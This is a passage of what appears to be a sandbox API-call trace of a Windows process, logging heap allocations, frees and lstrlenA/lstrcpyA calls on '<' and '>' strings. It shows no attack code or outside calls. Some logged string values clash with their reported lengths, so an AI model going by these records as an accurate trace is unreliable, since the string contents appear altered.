lpString2=">" | out: lpString1=">") returned=">" [0179.603] lstrlenA (lpString=">") returned 4 [0179.603] GetProcessHeap () returned 0x5f0000 [0179.603] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f0c0 [0179.603] lstrcpyA (in: lpString1=0x61f0c0, lpString2=">" | out: lpString1=">") returned=">" [0179.603] GetProcessHeap () returned 0x5f0000 [0179.603] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.603] GetProcessHeap () returned 0x5f0000 [0179.603] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f100 | out: hHeap=0x5f0000) returned 1 [0179.603] GetProcessHeap () returned 0x5f0000 [0179.603] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x615c80, Size=0x1b) returned 0x615ee0 [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x5f0000) returned 1 [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e20 | out: hHeap=0x5f0000) returned 1 [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615da0 | out: hHeap=0x5f0000) returned 1 [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1b0 | out: hHeap=0x5f0000) returned 1 [0179.604] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615c80 [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615f40 [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615d20 [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f20 | out: hHeap=0x5f0000) returned 1 [0179.604] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f0c0 [0179.604] lstrlenA (lpString="<") returned 1 [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f230 [0179.604] lstrcpyA (in: lpString1=0x61f230, lpString2="<" | out: lpString1="<") returned="<" [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f160 [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f160, Size=0x11) returned 0x615ca0 [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f230 | out: hHeap=0x5f0000) returned 1 [0179.604] lstrlenA (lpString=">") returned 1 [0179.604] GetProcessHeap () returned 0x5f0000 [0179.604] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f1b0 [0179.605] lstrcpyA (in: lpString1=0x61f1b0, lpString2=">" | out: lpString1=">") returned=">" [0179.605] lstrlenA (lpString="") returned 1 [0179.606] GetProcessHeap () returned 0x5f0000 [0179.606] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f120 [0179.606] lstrcpyA (in: lpString1=0x61f120, lpString2=">" | out: lpString1=">") returned=">" [0179.606] lstrlenA (lpString=">") returned 4 [0179.606] GetProcessHeap () returned 0x5f0000 [0179.606] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f0d0 [0179.606] lstrcpyA (in: lpString1=0x61f0d0, lpString2=">" | out: lpString1=">") returned=">" [0179.606] GetProcessHeap () returned 0x5f0000 [0179.606] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0179.606] GetProcessHeap () returned 0x5f0000 [0179.606] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f120 | out: hHeap=0x5f0000) returned 1 [0179.606] GetProcessHeap () returned 0x5f0000 [0179.606] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615cc0 | out: hHeap=0x5f0000) returned 1 [0179.606] GetProcessHeap () returned 0x5f0000 [0179.607] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f80 | out: hHeap=0x5f0000) returned 1 [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.607] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613320 [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f00 [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615fa0 [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615f60 [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d20 | out: hHeap=0x5f0000) returned 1 [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x5f0000) returned 1 [0179.607] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615c80 | out: hHeap=0x5f0000) returned 1 [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f1a0 [0179.607] lstrlenA (lpString="<") returned 1 [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0c0 [0179.607] lstrcpyA (in: lpString1=0x61f0c0, lpString2="<" | out: lpString1="<") returned="<" [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f230 [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f230, Size=0x11) returned 0x615f80 [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.607] lstrlenA (lpString=">") returned 1 [0179.607] GetProcessHeap () returned 0x5f0000 [0179.607] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0c0 [0179.607] lstrcpyA (in: lpString1=0x61f0c0, lpString2=">" | out: lpString1=">") returned=">" [0179.607] lstrlenA (lpString="") returned 1 [0179.609] GetProcessHeap () returned 0x5f0000 [0179.609] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f160 [0179.609] lstrcpyA (in: lpString1=0x61f160, lpString2=">" | out: lpString1=">") returned=">" [0179.609] lstrlenA (lpString=">") returned 4 [0179.609] GetProcessHeap () returned 0x5f0000 [0179.609] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f0c0 [0179.609] lstrcpyA (in: lpString1=0x61f0c0, lpString2=">" | out: lpString1=">") returned=">" [0179.609] GetProcessHeap () returned 0x5f0000 [0179.609] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.609] GetProcessHeap () returned 0x5f0000 [0179.609] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f160 | out: hHeap=0x5f0000) returned 1 [0179.609] GetProcessHeap () returned 0x5f0000 [0179.609] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e40 | out: hHeap=0x5f0000) returned 1 [0179.609] GetProcessHeap () returned 0x5f0000 [0179.609] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0179.609] GetProcessHeap () returned 0x5f0000 [0179.609] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f80 | out: hHeap=0x5f0000) returned 1 [0179.609] GetProcessHeap () returned 0x5f0000 [0179.609] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0179.609] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x616850 [0179.609] GetProcessHeap () returned 0x5f0000 [0179.610] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615cc0 [0179.610] GetProcessHeap () returned 0x5f0000 [0179.610] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615fc0 [0179.610] GetProcessHeap () returned 0x5f0000 [0179.610] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615f20 [0179.610] GetProcessHeap () returned 0x5f0000 [0179.610] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615e00 [0179.610] GetProcessHeap () returned 0x5f0000 [0179.610] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615fa0 | out: hHeap=0x5f0000) returned 1 [0179.610] GetProcessHeap () returned 0x5f0000 [0179.610] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0179.610] GetProcessHeap () returned 0x5f0000 [0179.610] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f00 | out: hHeap=0x5f0000) returned 1 [0179.610] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0179.610] GetProcessHeap () returned 0x5f0000 [0179.610] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f1a0 [0179.610] lstrlenA (lpString="<") returned 1 [0179.610] GetProcessHeap () returned 0x5f0000 [0179.610] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f120 [0179.610] lstrcpyA (in: lpString1=0x61f120, lpString2="<" | out: lpString1="<") returned="<" [0179.610] GetProcessHeap () returned 0x5f0000 [0179.610] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f140 [0179.610] GetProcessHeap () returned 0x5f0000 [0179.610] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f140, Size=0x11) returned 0x615f00 [0179.610] GetProcessHeap () returned 0x5f0000 [0179.610] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f120 | out: hHeap=0x5f0000) returned 1 [0179.610] lstrlenA (lpString=">") returned 1 [0179.610] GetProcessHeap () returned 0x5f0000 [0179.610] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f220 [0179.610] lstrcpyA (in: lpString1=0x61f220, lpString2=">" | out: lpString1=">") returned=">" [0179.610] lstrlenA (lpString="") returned 1 [0179.612] GetProcessHeap () returned 0x5f0000 [0179.612] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f1b0 [0179.612] lstrcpyA (in: lpString1=0x61f1b0, lpString2=">" | out: lpString1=">") returned=">" [0179.612] lstrlenA (lpString=">") returned 4 [0179.612] GetProcessHeap () returned 0x5f0000 [0179.612] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f220 [0179.612] lstrcpyA (in: lpString1=0x61f220, lpString2=">" | out: lpString1=">") returned=">" [0179.612] GetProcessHeap () returned 0x5f0000 [0179.612] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0179.612] GetProcessHeap () returned 0x5f0000 [0179.612] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1b0 | out: hHeap=0x5f0000) returned 1 [0179.612] GetProcessHeap () returned 0x5f0000 [0179.612] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615c80 | out: hHeap=0x5f0000) returned 1 [0179.612] GetProcessHeap () returned 0x5f0000 [0179.612] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e20 | out: hHeap=0x5f0000) returned 1 [0179.612] GetProcessHeap () returned 0x5f0000 [0179.612] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f00 | out: hHeap=0x5f0000) returned 1 [0179.612] GetProcessHeap () returned 0x5f0000 [0179.612] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0179.612] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x60) returned 0x6187d0 [0179.612] GetProcessHeap () returned 0x5f0000 [0179.613] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x615f60 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615c80 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615fe0 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f40 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615e80 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615fc0 | out: hHeap=0x5f0000) returned 1 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f20 | out: hHeap=0x5f0000) returned 1 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e00 | out: hHeap=0x5f0000) returned 1 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615cc0 | out: hHeap=0x5f0000) returned 1 [0179.613] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x616850 | out: hHeap=0x5f0000) returned 1 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f0c0 [0179.613] lstrlenA (lpString="<") returned 1 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0d0 [0179.613] lstrcpyA (in: lpString1=0x61f0d0, lpString2="<" | out: lpString1="<") returned="<" [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0e0 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f0e0, Size=0x11) returned 0x615e60 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0179.613] lstrlenA (lpString=">") returned 1 [0179.613] GetProcessHeap () returned 0x5f0000 [0179.613] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0d0 [0179.613] lstrcpyA (in: lpString1=0x61f0d0, lpString2=">" | out: lpString1=">") returned=">" [0179.613] lstrlenA (lpString="") returned 1 [0179.615] GetProcessHeap () returned 0x5f0000 [0179.615] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0d0 [0179.615] lstrcpyA (in: lpString1=0x61f0d0, lpString2=">" | out: lpString1=">") returned=">" [0179.615] lstrlenA (lpString=">") returned 4 [0179.615] GetProcessHeap () returned 0x5f0000 [0179.615] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f0e0 [0179.615] lstrcpyA (in: lpString1=0x61f0e0, lpString2=">" | out: lpString1=">") returned=">" [0179.615] GetProcessHeap () returned 0x5f0000 [0179.615] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0179.615] GetProcessHeap () returned 0x5f0000 [0179.615] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0179.615] GetProcessHeap () returned 0x5f0000 [0179.615] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f20 | out: hHeap=0x5f0000) returned 1 [0179.615] GetProcessHeap () returned 0x5f0000 [0179.615] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0179.615] GetProcessHeap () returned 0x5f0000 [0179.615] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e60 | out: hHeap=0x5f0000) returned 1 [0179.615] GetProcessHeap () returned 0x5f0000 [0179.615] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.615] GetProcessHeap () returned 0x5f0000 [0179.615] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x17) returned 0x615d60 [0179.615] GetProcessHeap () returned 0x5f0000 [0179.615] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f220 [0179.615] lstrlenA (lpString="<") returned 1 [0179.615] GetProcessHeap () returned 0x5f0000 [0179.615] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0c0 [0179.615] lstrcpyA (in: lpString1=0x61f0c0, lpString2="<" | out: lpString1="<") returned="<" [0179.615] GetProcessHeap () returned 0x5f0000 [0179.616] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0d0 [0179.616] GetProcessHeap () returned 0x5f0000 [0179.616] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f0d0, Size=0x11) returned 0x615f80 [0179.616] GetProcessHeap () returned 0x5f0000 [0179.616] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.616] lstrlenA (lpString=">") returned 1 [0179.616] GetProcessHeap () returned 0x5f0000 [0179.616] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0c0 [0179.616] lstrcpyA (in: lpString1=0x61f0c0, lpString2=">" | out: lpString1=">") returned=">" [0179.616] lstrlenA (lpString="") returned 1 [0179.617] GetProcessHeap () returned 0x5f0000 [0179.617] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f140 [0179.617] lstrcpyA (in: lpString1=0x61f140, lpString2=">" | out: lpString1=">") returned=">" [0179.617] lstrlenA (lpString=">") returned 4 [0179.617] GetProcessHeap () returned 0x5f0000 [0179.617] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f110 [0179.617] lstrcpyA (in: lpString1=0x61f110, lpString2=">" | out: lpString1=">") returned=">" [0179.617] GetProcessHeap () returned 0x5f0000 [0179.617] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f110 | out: hHeap=0x5f0000) returned 1 [0179.617] GetProcessHeap () returned 0x5f0000 [0179.618] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f140 | out: hHeap=0x5f0000) returned 1 [0179.618] GetProcessHeap () returned 0x5f0000 [0179.618] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d20 | out: hHeap=0x5f0000) returned 1 [0179.618] GetProcessHeap () returned 0x5f0000 [0179.618] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e60 | out: hHeap=0x5f0000) returned 1 [0179.625] GetProcessHeap () returned 0x5f0000 [0179.625] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f80 | out: hHeap=0x5f0000) returned 1 [0179.625] GetProcessHeap () returned 0x5f0000 [0179.625] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0179.625] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x90) returned 0x61c310 [0179.625] GetProcessHeap () returned 0x5f0000 [0179.625] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615e40 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615da0 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615e20 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x615ca0 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x615f80 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x17) returned 0x615fa0 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615c80 | out: hHeap=0x5f0000) returned 1 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615fe0 | out: hHeap=0x5f0000) returned 1 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x5f0000) returned 1 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e80 | out: hHeap=0x5f0000) returned 1 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0179.626] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6187d0 | out: hHeap=0x5f0000) returned 1 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f0c0 [0179.626] lstrlenA (lpString="<") returned 1 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f1a0 [0179.626] lstrcpyA (in: lpString1=0x61f1a0, lpString2="<" | out: lpString1="<") returned="<" [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f1b0 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f1b0, Size=0x11) returned 0x615c80 [0179.626] GetProcessHeap () returned 0x5f0000 [0179.626] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0179.626] lstrlenA (lpString=">") returned 1 [0179.627] GetProcessHeap () returned 0x5f0000 [0179.627] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0d0 [0179.627] lstrcpyA (in: lpString1=0x61f0d0, lpString2=">" | out: lpString1=">") returned=">" [0179.627] lstrlenA (lpString="") returned 1 [0179.628] GetProcessHeap () returned 0x5f0000 [0179.628] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f120 [0179.628] lstrcpyA (in: lpString1=0x61f120, lpString2=">" | out: lpString1=">") returned=">" [0179.628] lstrlenA (lpString=">") returned 4 [0179.628] GetProcessHeap () returned 0x5f0000 [0179.628] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f0d0 [0179.628] lstrcpyA (in: lpString1=0x61f0d0, lpString2=">" | out: lpString1=">") returned=">" [0179.628] GetProcessHeap () returned 0x5f0000 [0179.628] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0179.628] GetProcessHeap () returned 0x5f0000 [0179.628] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f120 | out: hHeap=0x5f0000) returned 1 [0179.628] GetProcessHeap () returned 0x5f0000 [0179.628] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0179.628] GetProcessHeap () returned 0x5f0000 [0179.628] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x5f0000) returned 1 [0179.628] GetProcessHeap () returned 0x5f0000 [0179.628] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615c80 | out: hHeap=0x5f0000) returned 1 [0179.628] GetProcessHeap () returned 0x5f0000 [0179.628] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0179.628] GetProcessHeap () returned 0x5f0000 [0179.628] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x615e60 [0179.629] GetProcessHeap () returned 0x5f0000 [0179.629] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f220 [0179.629] lstrlenA (lpString="<") returned 1 [0179.629] GetProcessHeap () returned 0x5f0000 [0179.630] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0e0 [0179.630] lstrcpyA (in: lpString1=0x61f0e0, lpString2="<" | out: lpString1="<") returned="<" [0179.630] GetProcessHeap () returned 0x5f0000 [0179.630] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f120 [0179.630] GetProcessHeap () returned 0x5f0000 [0179.630] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f120, Size=0x11) returned 0x615f00 [0179.630] GetProcessHeap () returned 0x5f0000 [0179.630] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0179.630] lstrlenA (lpString=">") returned 1 [0179.630] GetProcessHeap () returned 0x5f0000 [0179.630] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f100 [0179.630] lstrcpyA (in: lpString1=0x61f100, lpString2=">" | out: lpString1=">") returned=">" [0179.630] lstrlenA (lpString="") returned 1 [0179.631] GetProcessHeap () returned 0x5f0000 [0179.631] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f1a0 [0179.631] lstrcpyA (in: lpString1=0x61f1a0, lpString2=">" | out: lpString1=">") returned=">" [0179.631] lstrlenA (lpString=">") returned 4 [0179.631] GetProcessHeap () returned 0x5f0000 [0179.631] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f230 [0179.631] lstrcpyA (in: lpString1=0x61f230, lpString2=">" | out: lpString1=">") returned=">" [0179.631] GetProcessHeap () returned 0x5f0000 [0179.631] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f230 | out: hHeap=0x5f0000) returned 1 [0179.632] GetProcessHeap () returned 0x5f0000 [0179.632] HeapFree 